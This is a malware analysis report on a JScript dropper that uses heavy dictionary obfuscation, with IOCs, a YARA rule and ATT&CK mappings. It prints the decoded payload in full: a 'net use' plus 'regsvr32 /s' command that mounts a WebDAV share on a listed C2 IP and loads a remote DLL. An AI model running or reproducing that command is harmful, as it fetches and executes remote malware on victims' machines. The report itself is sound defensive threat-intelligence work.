typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-25updated2026-07-25scriptdropperc2obfuscationdefense-evasionexecutionmitre-attck
SHA-256: 2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca

unclassified-js-webdav-dropper: 2d0a9871 — 62-entry noise-dictionary, 877-char variable name, WebDAV C2 94.159.113.79:8888

Executive Summary

JScript dropper belonging to the 107-sibling unclassified-js-webdav-dropper family. Uses a 62-entry dictionary lookup-table with random noise keys (507–999 characters each) and a 877-character variable name to inflate file size. At runtime it assembles a PowerShell -EncodedCommand payload via Function('return this')() that mounts a WebDAV share and silently registers a remote DLL. Seventh confirmed sibling on C2 IP 94.159.113.79:8888. Static-only — CAPE skipped because the file is a single-line JScript, not a supported binary class.

What It Is

  • SHA-256: 2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca ^[file.txt]
  • Filename: 2277927785982214354.js ^[metadata.json]
  • Size: 659,556 bytes (644 KB) ^[file.txt]
  • Type: ASCII text, single line, no line terminators ^[file.txt]
  • Family: unclassified-js-webdav-dropper (107th confirmed sibling) ^[/intel/analyses/2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca.html]
  • CAPE: skipped — unsupported file type for detonation ^[dynamic-analysis.md]

How It Works

  1. Dictionary seeding: Declares a single array variable with a 877-character random noise name, then assigns 62 single-character values into it using random noise keys averaging 756 characters in length (range 507–999) ^[safe_exec2_output.txt].
  2. Payload assembly: Uses Function('return this')() to obtain a reference to the global object, then chains bracket-indexed lookups (var['key']) with + concatenation to build the payload string ^[safe_exec2_output.txt].
  3. Execution: The assembled payload is passed to WScript.Shell.Run() as a PowerShell -EncodedCommand string. The decoded command is:
    net use \\94.159.113.79@8888\davwwwroot\;regsvr32 /s \\94.159.113.79@8888\davwwwroot\8869272362403.dll
    
    ^[safe_exec2_output.txt]
  4. No decoy, no gate, no wrapper: No wordpad decoy, no timeout anti-emulation gate, no sandbox checks, no batch/polyglot layer, no nested try/catch decoys — minimal footprint execution chain. ^[stats.js]

C2 Infrastructure

Indicator Value
WebDAV C2 94.159.113.79:8888 ^[safe_exec2_output.txt]
Payload DLL 8869272362403.dll ^[safe_exec2_output.txt]
Execution method regsvr32 /s via PowerShell -EncodedCommand ^[safe_exec2_output.txt]
WebDAV path \\94.159.113.79@8888\davwwwroot\ ^[safe_exec2_output.txt]

Interesting Tidbits

  • 877-character variable name — not the longest in the family (record held by dfb1eb98 at ~3,787 chars), but well above the 8–20 character norm for non-extreme variants. ^[stats.js]
  • Mean key length 756 characters — typical for extreme-padding variants in this family. Inflates the file to 644 KB without adding functional complexity. ^[stats.js]
  • Seventh sibling on 94.159.113.79:8888 — joins fe261d49 (68th), be172014 (74th), dc76a67d (79th), 9665f822 (102nd), 26666aa2 (104th), and 27e35f3c (105th) on this endpoint. Sustained activity on .79 is now confirmed across seven samples. ^[entities/unclassified-js-webdav-dropper.md]
  • No try/catch decoys — unlike e6ebae6a and cc90d6c which wrap execution in nested try/catch blocks with decoy labels, this sample dispenses with them entirely. ^[safe_exec2_output.txt]

Deployable Signatures

YARA rule

rule WebDAV_JS_Dropper_Dictionary_62Entry_ExtremePadding
{
    meta:
        description = "JScript WebDAV dropper with 62-entry dictionary and extreme variable-name padding"
        author = "PacketPursuit"
        family = "unclassified-js-webdav-dropper"
        reference = "2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca"
    strings:
        $func_this = "Function(''"
        $func_end = ")("
        $dav = "davwwwroot" nocase
        $regsvr = "regsvr32" nocase
        $net_use = "net use" nocase
        $encoded = "-EncodedCommand"
    condition:
        all of them and
        filesize > 500KB and
        filesize < 1MB and
        #func_this >= 1
}

Behavioral fingerprint

A .js file delivered to a victim, opened via wscript.exe, declares a single array variable with a name longer than 500 characters, populates it with ~60 single-character assignments via random noise keys also longer than 500 characters, then calls Function('return this')() to assemble and execute a PowerShell -EncodedCommand payload that mounts a WebDAV share and runs regsvr32 /s against a remote DLL.

IOCs

Type Value
SHA-256 2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca
C2 IP 94.159.113.79:8888
Payload DLL 8869272362403.dll
Execution regsvr32 /s \\94.159.113.79@8888\davwwwroot\8869272362403.dll

Detection Signatures (ATT&CK)

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) .js file executed by wscript.exe ^[safe_exec2_output.txt]
Execution T1059.001 (PowerShell) PowerShell -EncodedCommand wrapper ^[safe_exec2_output.txt]
Execution T1218.010 (Regsvr32) regsvr32 /s \\host@8888\davwwwroot\*.dll ^[safe_exec2_output.txt]
Defense Evasion T1218 (System Binary Proxy Execution) wscript.exe → powershell.exe → regsvr32.exe chain ^[safe_exec2_output.txt]
Defense Evasion T1027 (Obfuscated Files or Information) Dictionary lookup-table obfuscation with extreme padding ^[safe_exec2_output.txt]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP via UNC path ^[safe_exec2_output.txt]
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV; regsvr32 fetches and loads remote DLL ^[safe_exec2_output.txt]

References

Provenance

  • Static analysis of <sample 2d0a98714f59.bin> via Node.js vm.runInContext with proxy-based Function and eval interception ^[safe_exec2_output.txt].
  • Dictionary entry count and key-length statistics computed via JavaScript regex against the raw file ^[stats.js].
  • File type from file utility ^[file.txt].
  • ExifTool metadata from exiftool ^[exiftool.json].
  • CAPE status from dynamic-analysis.md ^[dynamic-analysis.md].